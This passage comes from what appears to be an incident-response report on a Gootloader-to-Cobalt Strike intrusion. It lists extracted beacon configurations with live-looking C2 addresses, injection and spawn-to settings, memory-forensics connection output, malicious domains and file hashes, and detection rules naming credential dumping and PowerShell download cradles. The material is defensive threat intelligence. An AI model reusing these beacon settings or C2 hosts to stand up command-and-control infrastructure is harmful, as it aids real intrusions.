x86:
beacon_type: HTTPS
dns-beacon.strategy_fail_seconds: -1
dns-beacon.strategy_fail_x: -1
dns-beacon.strategy_rotate_seconds: -1
http-get.client: Cookie
http-get.uri: 37.120.198.225,/cm
http-get.verb: GET
http-post.client: Content-Type: application/octet-stream id
http-post.uri: /submit.php
http-post.verb: POST
maxgetsize: 1048576
port: 443
post-ex.spawnto_x64: %windir%\sysnative\rundll32.exe
post-ex.spawnto_x86: %windir%\syswow64\rundll32.exe
process-inject.execute: CreateThread SetThreadContext CreateRemoteThread RtlCreateUserThread
process-inject.startrwx: 64
process-inject.stub: 222b8f27dbdfba8ddd559eeca27ea648
process-inject.userwx: 64
proxy.behavior: 2 (Use IE settings)
server.publickey_md5: defb5d95ce99e1ebbf421a1a38d9cb64
sleeptime: 60000
useragent_header: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
uses_cookies: 1
watermark: 1580103824

x64:
beacon_type: HTTPS
dns-beacon.strategy_fail_seconds: -1
dns-beacon.strategy_fail_x: -1
dns-beacon.strategy_rotate_seconds: -1
http-get.client: Cookie
http-get.uri: 37.120.198.225,/ptj
http-get.verb: GET
http-post.client: Content-Type: application/octet-stream id
http-post.uri: /submit.php
http-post.verb: POST
maxgetsize: 1048576
port: 443
post-ex.spawnto_x64: %windir%\sysnative\rundll32.exe
post-ex.spawnto_x86: %windir%\syswow64\rundll32.exe
process-inject.execute: CreateThread SetThreadContext CreateRemoteThread RtlCreateUserThread
process-inject.startrwx: 64
process-inject.stub: 222b8f27dbdfba8ddd559eeca27ea648
process-inject.userwx: 64
proxy.behavior: 2 (Use IE settings)
server.publickey_md5: defb5d95ce99e1ebbf421a1a38d9cb64
sleeptime: 60000
useragent_header: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts; IE0006_ver1;EN_GB)
uses_cookies: 1
watermark: 1580103824

All four beacons share the same watermark (1580103824), server public key MD5 and injection stub, so the two servers belong to the same Cobalt Strike licence and profile; only the GET URIs and User-Agent strings differ.

Real Intelligence Threat Analytics (RITA, https://github.com/activecm/rita) was successful in locating one of the IP addresses used for Cobalt Strike command and control communications (see the image in the original post).

Netscan data extracted via Volatility from the beachhead host, showing the Cobalt Strike C2 connections held by rundll32.exe (PID 3420):

Volatility 3 Framework 2.0.0

Offset          Proto  LocalAddr  LocalPort  ForeignAddr   ForeignPort  State       PID   Owner         Created
...
0x948431c46010  TCPv4  10.X.X.X   52670      146.70.78.43  443          CLOSE_WAIT  3420  rundll32.exe
0x948431e19010  TCPv4  10.X.X.X   63723      146.70.78.43  443          CLOSED      3420  rundll32.exe
0x9484337f18a0  TCPv4  10.X.X.X   52697      146.70.78.43  443          CLOSE_WAIT  3420  rundll32.exe
0x948435102050  TCPv4  10.X.X.X   52689      146.70.78.43  443          CLOSE_WAIT  3420  rundll32.exe
...
Impact

In this case, there was no further impact to the environment before the threat actors were evicted.

Indicators

Network

Gootloader
https://kakiosk.adsparkdev[.]com
https://jp.imonitorsoft[.]com
https://junk-bros[.]com
35.206.117.64:443

Cobalt Strike
146.70.78.43:443
37.120.198.225:443

File

olympus_plea_agreement 34603 .js
MD5: d7d3e1c76d5e2fa9f7253c8ababd6349
SHA1: 724013ea6906a3122698fd125f55546eac0c1fe0
SHA256: 6e141779a4695a637682d64f7bc09973bb82cd24211b2020c8c1648cdb41001b

olympus plea agreement(46196).zip
MD5: b50333ff4e5cbcda8b88ce109e882eeb
SHA1: 44589fc2a4d1379bee93282bbdb16acbaf762a45
SHA256: 7d93b3531f5ab7ef8d68fb3d06f57e889143654de4ba661e5975dae9679bbb2c

mi.ps1
MD5: acef25c1f6a7da349e62b365c05ae60c
SHA1: c5d134a96ca4d33e96fb0ab68cf3139a95cf8071
SHA256: d00edf5b9a9a23d3f891afd51260b3356214655a73e1a361701cda161798ea0b

Invoke-WMIExec.ps1
MD5: b4626a335789e457ea48e56dfbf39710
SHA1: 62a7656d81789591358796100390799e83428519
SHA256: c4939f6ad41d4f83b427db797aaca106b865b6356b1db3b7c63b995085457222

ls.exe
MD5: 87ae2a50ba94f45da39ec7673d71547c
SHA1: dfa0b4206abede8f441fcdc8155803b8967e035c
SHA256: 8764131983eac23033c460833de5e439a4c475ad94cfd561d80cb62f86ff50a4

Detections

Network

ET HUNTING Suspicious Empty SSL Certificate - Observed in Cobalt Strike
ET MALWARE Meterpreter or Other Reverse Shell SSL Cert

Sigma

Custom Sigma rules:
Deleting Windows Defender scheduled tasks – https://github.com/The-DFIR-Report/Sigma-Rules/blob/main/Deleting%20Windows%20Defender%20scheduled%20tasks
Enabling restricted admin mode – https://github.com/The-DFIR-Report/Sigma-Rules/blob/main/Enabling%20restricted%20admin%20mode
Using powershell specific download cradle OneLiner – https://github.com/The-DFIR-Report/Sigma-Rules/blob/main/Using%20powershell%20specific%20download%20cradle%20OneLiner
Using Lazagne to dump credentials – https://github.com/The-DFIR-Report/Sigma-Rules/blob/main/Using%20Lazagne%20to%20dump%20credentials

Sigma repo rules:
Bloodhound Detection – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_hack_bloodhound.yml
Powershell download – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_powershell_download_patterns.yml
Defender Disable via Powershell – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml
Creation of Scheduled Task via Powershell – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml
LaZagne LSASS Access – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_access/proc_access_win_lazagne_cred_dump_lsass_access.yml
Systeminfo Discovery – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_systeminfo.yml
CobaltStrike Named Pipe – https://github.com/SigmaHQ/sigma/blob/7fb8272f948cc0b528fe7bd36df36449f74b2266/rules/windows/pipe_created/pipe_created_mal_cobaltstrike.yml
Malicious PowerShell Commandlets – https://github.com/SigmaHQ/sigma/blob/becf3baeb4f6313bf267f7e8d6e9808fc0fc059c/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml
Suspicious Service Installation – https://github.com/SigmaHQ/sigma/blob/7d48d0e838b76f3fb5bc623e7ec45343cfac9c88/rules/windows/builtin/system/win_susp_service_installation.yml
Suspicious XOR Encoded PowerShell Command Line – https://github.com/SigmaHQ/sigma/blob/becf3baeb4f6313bf267f7e8d6e9808fc0fc059c/rules/windows/powershell/powershell_classic/posh_pc_xor_commandline.yml
Too Long PowerShell Commandlines – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_long_powershell_commandline.yml
PowerShell Network Connections – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/network_connection/net_connection_win_powershell_network_connection.yml
Rundll32 Internet Connection – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml
Mimikatz Use – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_alert_mimikatz_keywords.yml

Yara

Custom Yara rule – https://github.com/The-DFIR-Report/Yara-Rules/blob/main/SEO%20Poisoning%20%E2%80%93%20A%20Gootloader%20Story

MITRE

T1189 – Drive-by Compromise
T1204.001 – User Execution: Malicious Link
T1204.002 – User Execution: Malicious File
T1059.001 – Command and Scripting Interpreter: PowerShell
T1053 – Scheduled Task/Job
T1218.011 – System Binary Proxy Execution: Rundll32
T1555 – Credentials from Password Stores
T1003.001 – OS Credential Dumping: LSASS Memory
T1087 – Account Discovery
T1560 – Archive Collected Data
T1482 – Domain Trust Discovery
T1615 – Group Policy Discovery
T1069 – Permission Groups Discovery
T1018 – Remote System Discovery
T1033 – System Owner/User Discovery
T1021.001 – Remote Services: Remote Desktop Protocol
T1021.006 – Remote Services: Windows Remote Management
T1005 – Data from Local System
T1039 – Data from Network Shared Drive
T1046 – Network Service Scanning
T1562.001 – Impair Defenses: Disable or Modify Tools
T1518.001 – Security Software Discovery
T1071.001 – Application Layer Protocol: Web Protocols
T1027 – Obfuscated Files or Information

Internal case #11462